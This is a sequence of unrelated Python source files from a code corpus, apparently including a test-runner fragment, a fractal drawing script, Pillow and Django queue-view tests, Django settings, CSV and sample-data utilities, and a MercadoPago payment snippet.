'previous_run' : self.previous_run_results.get((class_path, method), None),
'start_time' : time.time()-self.runner_timeout,
'end_time' : time.time(),
'run_time' : self.runner_timeout,
'normalized_run_time' : "%.2fs" % (self.runner_timeout),
'complete': True, # We've tried running the test.
'success' : False,
'failure' : False,
'error' : True,
'interrupted' : False,
'exception_info' : [error_message],
'exception_info_pretty' : [error_message],
'runner_id' : runner,
'method' : {
'module' : module,
'class' : classname,
'name' : method,
'full_name' : "%s.%s" % (class_path, method),
'fixture_type' : None,
}
}
if (class_path, method) not in self.timeout_rerun_methods:
requeue_dict['methods'].append(method)
self.timeout_rerun_methods.add((class_path, method))
self.previous_run_results[(class_path, method)] = result_dict
else:
for reporter in self.test_reporters:
reporter.test_start(result_dict)
reporter.test_complete(result_dict)
if requeue_dict['methods']:
self.test_queue.put(-1, requeue_dict)
if self.test_queue.empty() and len(self.checked_out) == 0:
self.shutdown()
def timeout_class(self, runner, class_path):
"""Check that it's actually time to rerun this class; if not, reset the timeout. Check the class in and rerun it."""
d = self.checked_out.get(class_path, None)
if not d:
return
if time.time() < d['timeout_time']:
# We're being called for the first time, or someone has updated timeout_time since the timeout was set (e.g. results came in)
tornado.ioloop.IOLoop.instance().add_timeout(d['timeout_time'], lambda: self.timeout_class(runner, class_path))
return
try:
self.check_in_class(runner, class_path, timed_out=True)
except ValueError:
# If another builder has checked out the same class in the mean time, don't throw an error.
pass
def early_shutdown(self):
for class_path in self.checked_out.keys():
self.check_in_class(None, class_path, early_shutdown=True)
self.shutdown()
def shutdown(self):
if self.shutting_down:
# Try not to shut down twice.
return
self.shutting_down = True
self.test_queue.finalize()
iol = tornado.ioloop.IOLoop.instance()
# Can't immediately call stop, otherwise the runner currently POSTing its results will get a Connection Refused when it tries to ask for the next test.
if self.runners_outstanding:
# Stop in 5 seconds if all the runners_outstanding don't come back by then.
iol.add_timeout(time.time()+self.shutdown_delay_for_outstanding_runners, iol.stop)
else:
# Give tornado enough time to finish writing to all the clients, then shut down.
iol.add_timeout(time.time()+self.shutdown_delay_for_connection_close, iol.stop)
| StarcoderdataPython |
3354890 | <reponame>pysrc/fractal
# FASS (space-filling) curve drawn via a D0L-system.
from fractal import Pen

# 420x420 canvas, pen starting near the top-left corner.
pen = Pen([420, 420])
pen.setPoint([10, 10])
# Axiom "L" with the classic FASS rewrite rules, 90-degree turns,
# 4 rewriting iterations.
pen.doD0L(omega="L",
          P={"L": "LFRFL-FF-RFLFR+FF+LFRFL",
             "R": "RFLFR+FF+LFRFL-FF-RFLFR"},
          delta=90, times=4, length=200, rate=3)
pen.wait()
4817785 | <reponame>radicalgraphics/Pillow
from tester import *
from PIL import Image
def test_sanity():
    # getbbox() on the reference image must yield a tuple of box edges.
    box = lena().getbbox()
    assert_true(isinstance(box, tuple))
def test_bbox():
    # The identical paste/getbbox sequence applies to both the 8-bit ("L")
    # and 32-bit ("RGB") modes, so run it once per mode instead of
    # duplicating the block verbatim.
    for mode in ("L", "RGB"):
        im = Image.new(mode, (100, 100), 0)
        # A fully black image has no bounding box.
        assert_equal(im.getbbox(), None)

        im.paste(255, (10, 25, 90, 75))
        assert_equal(im.getbbox(), (10, 25, 90, 75))

        # A second, crossing paste grows the bbox to the union.
        im.paste(255, (25, 10, 75, 90))
        assert_equal(im.getbbox(), (10, 10, 90, 90))

        # Pasting past the edges clamps the bbox to the image bounds.
        im.paste(255, (-10, -10, 110, 110))
        assert_equal(im.getbbox(), (0, 0, 100, 100))
| StarcoderdataPython |
4804152 | """
Django settings for filmer project.
Generated by 'django-admin startproject' using Django 3.2.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
import dj_database_url
from dotenv import load_dotenv
# Pull variables from a local .env file into the environment (no-op if absent).
load_dotenv()

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv("DJANGO_SECRET_KEY")

# SECURITY WARNING: don't run with debug turned on in production!
# Only the literal string "True" enables debug; unset/other values disable it.
DEBUG = os.getenv("DEBUG") == "True"

# NOTE(review): "*" accepts any Host header; acceptable behind a proxy that
# validates hosts, otherwise consider restricting this list.
ALLOWED_HOSTS = ["*"]

# django.contrib.sites site used by this deployment.
SITE_ID = 1

# Application definition

DJANGO_APPS = [
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.messages",
    "django.contrib.staticfiles",
    "django.contrib.postgres",
    "django.contrib.sites",
]

THIRD_PARTY_APPS = [
    "crispy_forms",
    "django_filters",
    "django_extensions",
    "rest_framework",
    "debug_toolbar",
]

HEALTHCHECKS_APPS = [
    "health_check",  # required
    "health_check.db",  # stock Django health checkers
    # 'health_check.cache',
    # 'health_check.storage',
    "health_check.contrib.migrations",
    # 'health_check.contrib.celery', # requires celery
    # 'health_check.contrib.celery_ping', # requires celery
    # 'health_check.contrib.psutil', # disk and memory utilization; requires psutil
    # 'health_check.contrib.s3boto3_storage', # requires boto3 and S3BotoStorage backend
    # 'health_check.contrib.rabbitmq', # requires RabbitMQ broker
    # 'health_check.contrib.redis', # requires Redis broker
]

# First-party apps of this project.
FILMER_APPS = [
    "api",
    "ui",
]

INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + HEALTHCHECKS_APPS + FILMER_APPS

# Development-only middleware, appended below.
DEV_MIDDLEWARE = [
    "debug_toolbar.middleware.DebugToolbarMiddleware",
]

MIDDLEWARE = [
    "django.middleware.security.SecurityMiddleware",
    "whitenoise.middleware.WhiteNoiseMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    "django.middleware.common.CommonMiddleware",
    "django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django.contrib.messages.middleware.MessageMiddleware",
    "django.middleware.clickjacking.XFrameOptionsMiddleware",
] + DEV_MIDDLEWARE

ROOT_URLCONF = "filmer.urls"

TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [],
        "APP_DIRS": True,
        "OPTIONS": {
            "context_processors": [
                "django.template.context_processors.debug",
                "django.template.context_processors.request",
                "django.contrib.auth.context_processors.auth",
                "django.contrib.messages.context_processors.messages",
            ],
        },
    },
]

WSGI_APPLICATION = "filmer.wsgi.application"

# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases

DATABASES = {}
# dj_database_url builds the connection settings from the DATABASE_URL
# environment variable (library default).
DATABASES["default"] = dj_database_url.config(conn_max_age=600)

# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        "NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
    },
    {
        "NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/

LANGUAGE_CODE = "en-us"

TIME_ZONE = "UTC"

USE_I18N = True

USE_L10N = True

USE_TZ = True

# Log everything to stdout at DEBUG level (12-factor style).
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "handlers": {
        "console": {
            "class": "logging.StreamHandler",
        },
    },
    "root": {
        "handlers": ["console"],
        "level": "DEBUG",
    },
}

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/

STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "assets"
# WhiteNoise serves compressed, cache-busted static files.
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"

# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field

DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"

REST_FRAMEWORK = {
    "DEFAULT_FILTER_BACKENDS": ["django_filters.rest_framework.DjangoFilterBackend"],
    "DEFAULT_PAGINATION_CLASS": "rest_framework.pagination.PageNumberPagination",
    "PAGE_SIZE": 10,
}

# External movie-database API keys; "fake" lets the app start without
# real credentials.
OMDB_API_KEY = os.getenv("OMDB_API_KEY", "fake")
TMDB_API_KEY = os.getenv("TMDB_API_KEY", "fake")

LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "/api/api-auth/login/"
| StarcoderdataPython |
3352635 | import csv
from random import randint
from datetime import datetime
from datetime import timedelta
from functools import reduce
# Subjects and words the synthetic dataset is built from.
candidates = ['<NAME>', '<NAME>', '<NAME>']
cuss_words = ['fuck', 'shit', 'ass', 'bitch',
              'douche', 'dick', 'damn', 'covfefe']

# Three hours in `interval` second intervals.
interval = 60
# Timestamps starting now, `interval` seconds apart.
# int(60/interval) intervals per minute * 60 minutes * 3 hours
# (assumes `interval` divides 60 evenly).
times = [datetime.now() + timedelta(seconds=(interval*t))
         for t in range(int(60/interval) * 60 * 3)]
def random_walk(walk_length):
    """Build a non-negative random walk of walk_length + 1 integer points.

    The walk starts at a random value in [0, 10]; each subsequent point
    moves up or down (random direction) by a random step in [0, 3] and is
    clamped at zero.
    """
    # Draw all step sizes first, then the starting point, then one direction
    # per step — this matches the evaluation order of the original
    # reduce-based implementation, so seeded runs produce identical walks.
    step_sizes = [randint(0, 3) for _ in range(walk_length)]
    walk = [randint(0, 10)]
    for size in step_sizes:
        direction = (-1) ** randint(0, 1)
        walk.append(max(0, walk[-1] + direction * size))
    return walk
# One record per (subject, word, timestamp); each (subject, word) pair gets
# its own random-walk series so counts evolve smoothly over time.
dataset = [{'subject': c, 'word': w, 'time': t.isoformat(), 'count': v}
           for c in candidates
           for w in cuss_words
           for t,v in zip(times, random_walk(len(times)))]

# BUG FIX: csv writers require the file to be opened with newline='';
# without it every row gains an extra blank line on Windows.
with open('sample_data.csv', 'w', newline='') as out:
    fieldnames = ["subject", "word", "time", "count"]
    writer = csv.DictWriter(out, fieldnames=fieldnames, delimiter="\t")
    writer.writeheader()
    # Emit rows in chronological order regardless of generation order.
    for row in sorted(dataset, key=lambda x: x['time']):
        writer.writerow(row)
| StarcoderdataPython |
3260356 | <filename>tools/_generic/randomize-csv.py
#!/usr/bin/env python3
import csv
import re
from argparse import ArgumentParser
from collections import defaultdict
from random import shuffle
from pprint import pprint
# Parsed command-line arguments; assigned in the __main__ block below and
# read by randomize() (expects a `srcfile` attribute).
config = None
# Maximum data-row index to read before stopping; -1 means "no limit"
# because the 0-based row counter can never equal -1.
limit = -1
def randomize():
    """Shuffle every column of ``config.srcfile`` independently, in place.

    The CSV is read into per-column lists, each column is shuffled on its
    own (destroying any correlation between the columns of a given row),
    and the file is overwritten with the shuffled values under the original
    header row.
    """
    # BUG FIX: csv.reader/csv.writer require newline='' on the file object;
    # without it, files written on Windows gain an extra blank line per row.
    with open(config.srcfile, "r", newline="") as csvfile:
        reader = csv.reader(csvfile)
        headers = next(reader)

        # Read the CSV into columns keyed by header name.
        values = defaultdict(list)
        for rowcount, row in enumerate(reader):
            # zip() silently drops cells beyond the header count.
            for colname, val in zip(headers, row):
                values[colname].append(val)
            # limit == -1 never matches the 0-based counter, i.e. no limit.
            if rowcount == limit:
                break

    # Shuffle each column independently.
    for col in values.values():
        shuffle(col)

    # Transpose the shuffled columns back into rows, in header order.
    rows = zip(*[values[hd] for hd in headers])

    # Overwrite the old file with the shuffled values.
    with open(config.srcfile, "w", newline="") as csvfile:
        writer = csv.writer(csvfile)
        writer.writerow(headers)
        for row in rows:
            writer.writerow(row)
if __name__ == "__main__":
    # Build the CLI, stash the parsed arguments in the module-level
    # `config` global, then shuffle the requested file in place.
    arg_parser = ArgumentParser(description="Randomize CSV files")
    arg_parser.add_argument("srcfile", help="Which file to randomize")
    config = arg_parser.parse_args()

    randomize()
| StarcoderdataPython |
from __future__ import unicode_literals
import json
import time
import django
import django.utils.timezone as timezone
from django.test import TestCase, TransactionTestCase
from rest_framework import status
import error.test.utils as error_test_utils
import job.test.utils as job_test_utils
import queue.test.utils as queue_test_utils
import recipe.test.utils as recipe_test_utils
import storage.test.utils as storage_test_utils
import util.rest as rest_util
from job.configuration.data.job_data import JobData
from job.models import Job
from queue.models import Queue
class TestJobLoadView(TransactionTestCase):
    """Tests for GET /load/, the job-load statistics endpoint."""
    def setUp(self):
        """Create three job types, each with one load entry in a distinct state."""
        django.setup()
        self.job_type1 = job_test_utils.create_job_type(name='test1', version='1.0', category='test-1', priority=1)
        queue_test_utils.create_job_load(job_type=self.job_type1, pending_count=1)
        # sleep's are needed because if the job load entries end up with the same timestamp, there will be fewer
        # entries in the GET then expected in the tests. sleep's ensure the timestamps will be different as they
        # maintain 3 sig figs in the decimal
        time.sleep(0.001)
        self.job_type2 = job_test_utils.create_job_type(name='test2', version='1.0', category='test-2', priority=2)
        queue_test_utils.create_job_load(job_type=self.job_type2, queued_count=1)
        time.sleep(0.001)
        self.job_type3 = job_test_utils.create_job_type(name='test3', version='1.0', category='test-3', priority=3)
        queue_test_utils.create_job_load(job_type=self.job_type3, running_count=1)
    def test_successful(self):
        """Tests successfully calling the job load view."""
        url = rest_util.get_url('/load/')
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        # One load entry per job type created in setUp
        self.assertEqual(len(result['results']), 3)
    def test_job_type_id(self):
        """Tests successfully calling the job load view filtered by job type identifier."""
        url = rest_util.get_url('/load/?job_type_id=%s' % self.job_type1.id)
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['pending_count'], 1)
    def test_job_type_name(self):
        """Tests successfully calling the job load view filtered by job type name."""
        url = rest_util.get_url('/load/?job_type_name=%s' % self.job_type2.name)
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['queued_count'], 1)
    def test_job_type_category(self):
        """Tests successfully calling the job load view filtered by job type category."""
        url = rest_util.get_url('/load/?job_type_category=%s' % self.job_type3.category)
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['running_count'], 1)
    def test_job_type_priority(self):
        """Tests successfully calling the job load view filtered by job type priority."""
        url = rest_util.get_url('/load/?job_type_priority=%s' % self.job_type1.priority)
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['pending_count'], 1)
    def test_max_duration(self):
        """Tests calling the job load view with time values that define a range greater than 31 days"""
        url = rest_util.get_url('/load/?started=2015-01-01T00:00:00Z&ended=2015-02-02T00:00:00Z')
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
class TestQueueNewJobView(TransactionTestCase):
    """Tests for POST /queue/new-job/, which queues a new job from a job type and data."""
    def setUp(self):
        """Create a job type with one file input/output, a workspace and a source file."""
        django.setup()
        self.interface = {
            'version': '1.1',
            'command': 'test_cmd',
            'command_arguments': 'test_arg',
            'input_data': [{
                'media_types': ['image/png'],
                'type': 'file',
                'name': 'input_file',
            }],
            'output_data': [{
                'name': 'output_file',
                'type': 'file',
                'media_type': 'image/png',
            }],
            'shared_resources': [],
        }
        self.job_type = job_test_utils.create_job_type(interface=self.interface)
        self.workspace = storage_test_utils.create_workspace()
        self.file1 = storage_test_utils.create_file(workspace=self.workspace)
    def test_bad_job_type_id(self):
        """Tests calling the queue new job view with an invalid job type ID."""
        json_data = {
            'job_type_id': -1234,
            'job_data': {},
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
    def test_bad_type_job_type_id(self):
        """Tests calling the queue new job view with a string job type ID (which is invalid)."""
        json_data = {
            'job_type_id': 'BAD',
            'job_data': {},
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_missing_job_type_id(self):
        """Tests calling the queue new job view without the required job type ID."""
        json_data = {
            'job_data': {},
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_bad_type_args(self):
        """Tests calling the queue new job view with a string job_data value (which is invalid)."""
        json_data = {
            'job_type_id': self.job_type.id,
            'job_data': 'BAD',
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_invalid_args(self):
        """Tests calling the queue new job view with invalid job_data for the job."""
        # Empty job_data fails validation against the job type interface above
        json_data = {
            'job_type_id': self.job_type.id,
            'job_data': {},
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_successful(self):
        """Tests calling the queue new job view successfully."""
        json_data = {
            'job_type_id': self.job_type.id,
            'job_data': {
                'version': '1.0',
                'input_data': [{
                    'name': 'input_file',
                    'file_id': self.file1.id,
                }],
                'output_data': [{
                    'name': 'output_file',
                    'workspace_id': self.workspace.id,
                }],
            },
        }
        url = rest_util.get_url('/queue/new-job/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)
        result = json.loads(response.content)
        self.assertTrue(response['Location'])
        self.assertEqual(result['job_type']['id'], self.job_type.id)
        self.assertEqual(result['status'], 'QUEUED')
        self.assertEqual(len(result['inputs']), 1)
        self.assertEqual(len(result['outputs']), 1)
class TestQueueNewRecipeView(TestCase):
    """Tests for POST /queue/new-recipe/, which queues a new recipe."""
    def setUp(self):
        """Initialize Django for each test."""
        django.setup()
    def test_bad_recipe_id(self):
        """Tests calling the queue recipe view with an invalid recipe ID."""
        json_data = {
            'recipe_type_id': -1234,
            'recipe_data': {},
        }
        url = rest_util.get_url('/queue/new-recipe/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
    def test_bad_type_recipe_id(self):
        """Tests calling the queue recipe view with a string recipe ID (which is invalid)."""
        # NOTE(review): payload uses 'recipe_id' while other tests use
        # 'recipe_type_id' — confirm which key the view validates.
        json_data = {
            'recipe_id': 'BAD',
            'recipe_data': {},
        }
        url = rest_util.get_url('/queue/new-recipe/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_missing_recipe_id(self):
        """Tests calling the queue recipe view without the required job type."""
        json_data = {
            'recipe_data': {},
        }
        url = rest_util.get_url('/queue/new-recipe/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST, response.content)
    def test_successful(self):
        """Tests calling the queue recipe view successfully."""
        recipe_type = recipe_test_utils.create_recipe_type()
        workspace = storage_test_utils.create_workspace()
        recipe_data = {
            'version': '1.0',
            'input_data': [],
            'workspace_id': workspace.id,
        }
        json_data = {
            'recipe_type_id': recipe_type.id,
            'recipe_data': recipe_data,
        }
        url = rest_util.get_url('/queue/new-recipe/')
        response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)
        result = json.loads(response.content)
        self.assertTrue(response['Location'])
        self.assertEqual(result['recipe_type']['id'], recipe_type.id)
class TestQueueStatusView(TransactionTestCase):
    """Tests for GET /queue/status/, which summarizes queued jobs per job type."""
    def setUp(self):
        """Create one job type with a single queued entry at priority 123."""
        django.setup()
        self.job_type = job_test_utils.create_job_type()
        self.queue = queue_test_utils.create_queue(job_type=self.job_type, priority=123)
    def test_successful(self):
        """Tests successfully calling the queue status view."""
        url = rest_util.get_url('/queue/status/')
        response = self.client.generic('GET', url)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['job_type']['id'], self.job_type.id)
        self.assertEqual(result['results'][0]['count'], 1)
        self.assertEqual(result['results'][0]['highest_priority'], 123)
        self.assertIsNotNone(result['results'][0]['longest_queued'])
class TestRequeueJobsView(TestCase):
    """Tests for POST /queue/requeue-jobs/, which re-queues failed/canceled jobs."""
    def setUp(self):
        """Create three jobs and a two-job recipe chaining Job 1 -> Job 2."""
        django.setup()
        self.job_1 = job_test_utils.create_job(status='RUNNING', num_exes=1)
        self.job_2 = job_test_utils.create_job(input={}, num_exes=0)
        self.job_3 = job_test_utils.create_job(status='FAILED', num_exes=1)
        definition = {
            'version': '1.0',
            'input_data': [],
            'jobs': [{
                'name': 'Job 1',
                'job_type': {
                    'name': self.job_1.job_type.name,
                    'version': self.job_1.job_type.version,
                }
            }, {
                'name': 'Job 2',
                'job_type': {
                    'name': self.job_2.job_type.name,
                    'version': self.job_2.job_type.version,
                },
                'dependencies': [{
                    'name': 'Job 1'
                }],
            }],
        }
        self.recipe_type = recipe_test_utils.create_recipe_type(definition=definition)
        self.recipe = recipe_test_utils.create_recipe(recipe_type=self.recipe_type)
        self.recipe_job = recipe_test_utils.create_recipe_job(recipe=self.recipe, job_name='Job 1', job=self.job_1)
        self.recipe_job = recipe_test_utils.create_recipe_job(recipe=self.recipe, job_name='Job 2', job=self.job_2)
    def test_v6(self):
        """Tests calling the v6 requeue view which should return 404"""
        json_data = {
            'job_ids': [1000],
        }
        url = '/v6/queue/requeue-jobs/'
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND, response.content)
    def test_no_match(self):
        """Tests calling the requeue view where there are no matching jobs to schedule."""
        json_data = {
            'job_ids': [1000],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 0)
    def test_requeue_canceled(self,):
        """Tests calling the requeue view successfully for a job that was never queued."""
        # make sure the job is in the right state despite not actually having been run
        Job.objects.update_status([self.job_2], 'CANCELED', timezone.now())
        base_count = Queue.objects.count()
        json_data = {
            'job_ids': [self.job_2.id],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        result = json.loads(response.content)
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_2.id)
        # A canceled job with no executions goes back to PENDING, not QUEUED
        self.assertEqual(result['results'][0]['status'], 'PENDING')
        self.assertEqual(Queue.objects.count() - base_count, 0)
    def test_requeue_failed(self,):
        """Tests calling the requeue view successfully for a job that was previously queued."""
        job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
        job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
        # make sure the job is in the right state despite not actually having been run
        Job.objects.update_status([self.job_2], 'FAILED', timezone.now(), error_test_utils.create_error())
        self.job_2.input = JobData().get_dict()
        self.job_2.num_exes = 2
        self.job_2.save()
        base_count = Queue.objects.count()
        json_data = {
            'job_ids': [self.job_2.id],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_2.id)
        # A failed job with prior executions is placed straight back on the queue
        self.assertEqual(result['results'][0]['status'], 'QUEUED')
        self.assertEqual(Queue.objects.count() - base_count, 1)
    def test_requeue_ignored(self,):
        """Tests calling the requeue view when the job has already completed."""
        job_test_utils.create_job_exe(job=self.job_2, status='COMPLETED')
        Job.objects.update_status([self.job_2], 'COMPLETED', timezone.now())
        json_data = {
            'job_ids': [self.job_2.id],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_2.id)
        # Completed jobs are reported but left untouched
        self.assertEqual(result['results'][0]['status'], 'COMPLETED')
    def test_status(self):
        """Tests successfully calling the requeue view filtered by status."""
        json_data = {
            'status': self.job_3.status,
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_3.id)
    def test_job_ids(self):
        """Tests successfully calling the requeue view filtered by job identifier."""
        json_data = {
            'job_ids': [self.job_3.id],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_3.id)
    def test_job_type_ids(self):
        """Tests successfully calling the requeue view filtered by job type identifier."""
        json_data = {
            'job_type_ids': [self.job_3.job_type.id],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['job_type']['id'], self.job_3.job_type.id)
    def test_job_type_names(self):
        """Tests successfully calling the requeue view filtered by job type name."""
        json_data = {
            'job_type_names': [self.job_3.job_type.name],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['job_type']['name'], self.job_3.job_type.name)
    # TODO: Remove when v5 deprecated
    def test_job_type_categories(self):
        """Tests successfully calling the requeue view filtered by job type category."""
        json_data = {
            'job_type_categories': [self.job_3.job_type.category],
        }
        url = '/v5/queue/requeue-jobs/'
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['job_type']['category'], self.job_3.job_type.category)
    def test_error_categories(self):
        """Tests successfully calling the requeue view filtered by job error category."""
        error = error_test_utils.create_error(category='DATA')
        job = job_test_utils.create_job(error=error)
        json_data = {
            'error_categories': [error.category],
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], job.id)
        self.assertEqual(result['results'][0]['error']['category'], error.category)
    def test_priority(self):
        """Tests successfully calling the requeue view changing the queue priority."""
        job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
        job_test_utils.create_job_exe(job=self.job_2, status='FAILED')
        # make sure the job is in the right state despite not actually having been run
        Job.objects.update_status([self.job_2], 'FAILED', timezone.now(), error_test_utils.create_error())
        self.job_2.input = JobData().get_dict()
        self.job_2.num_exes = 2
        self.job_2.save()
        json_data = {
            'job_ids': [self.job_2.id],
            'priority': 123,
        }
        url = rest_util.get_url('/queue/requeue-jobs/')
        response = self.client.post(url, json.dumps(json_data), 'application/json')
        self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)
        result = json.loads(response.content)
        self.assertEqual(len(result['results']), 1)
        self.assertEqual(result['results'][0]['id'], self.job_2.id)
        self.assertEqual(result['results'][0]['status'], 'QUEUED')
        # The requeued entry carries the priority override from the request
        queue = Queue.objects.get(job_id=self.job_2.id)
        self.assertEqual(queue.priority, 123)
| StarcoderdataPython |
import mercadopago
import json
# SDK client; "ACCESS_TOKEN" is a placeholder for a real MercadoPago token.
mp = mercadopago.MP("ACCESS_TOKEN")

# Create a payment via the /v1/payments API using a previously tokenized
# card ("token") on behalf of a saved customer ("payer").
payment = mp.post("/v1/payments", {
    "transaction_amount": 100,
    "token": "<KEY>",
    "description": "Title of what you are paying for",
    "installments": 1,
    "payer": {
        "type": "customer",
        "id": "12345678-abcdefghij"
    }
});

# Pretty-print the API response returned by the SDK.
print(json.dumps(payment, indent=4))
| StarcoderdataPython |
1741945 | <filename>pyfileconf_datacode/config.py
from typing import Iterable, Dict, List
from pyfileconf.selector.models.itemview import ItemView
def config_dependencies_for_section_path_strs(
    section_path_strs: Iterable[str],
) -> Dict[str, List["ItemView"]]:
    """Map each section path string to the ItemViews it depends on.

